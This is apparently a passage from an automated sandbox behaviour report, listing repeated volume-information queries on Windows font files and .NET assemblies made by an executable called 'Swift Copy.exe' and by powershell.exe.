Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
